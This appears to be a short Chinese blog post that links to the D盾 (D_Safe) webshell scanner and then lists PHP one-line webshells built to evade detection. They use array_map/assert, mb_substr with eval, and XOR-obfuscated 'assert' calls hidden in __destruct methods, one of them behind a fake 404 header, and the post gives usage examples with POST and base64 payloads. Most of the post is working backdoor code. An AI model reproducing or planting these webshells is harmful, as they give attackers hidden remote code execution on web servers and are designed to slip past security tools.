安装
下载
http://www.d99net.net/down/d_safe_2.1.5.2.zip
使用说明
http://www.d99net.net/News.asp?id=106
免杀
array_map | assert
<?php function test($a, $b) { array_map($a, $b); } test(assert, array($_POST['x'])); ?>
mb_substr
<?php $m=$_GET['1']; $a=mb_substr($m,0,1); $b=mb_substr($m,1,9999); eval($a.$b); ?>
PHP一句话
class LTDS { public function __destruct() { $bxo='X'^"\x39"; $woa='?'^"\x4c"; $ukt='K'^"\x38"; $gud='d'^"\x1"; $fbu='_'^"\x2d"; $agx='<'^"\x48"; $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx; return @$HLWV($this->OX); } } $ltds=new LTDS(); @$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8']; http://www.xxx.com/shell.php POST: ua8=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随意更改) POST: ua8=cGhwaW5mbygpOwo= //payload的base64编码
异或 | PHP一句话
<?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1='C'^"\x30"; $_2='A'^"\x32"; $_3='v'^"\x13"; $_4='J'^"\x38"; $_5='f'^"\x12"; $db=$_0.$_1.$_2.$_3.$_4.$_5; return @$db($this->c); } } $zxvg=new ZXVG(); @$zxvg->c=$_POST['mr6'];
2214
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
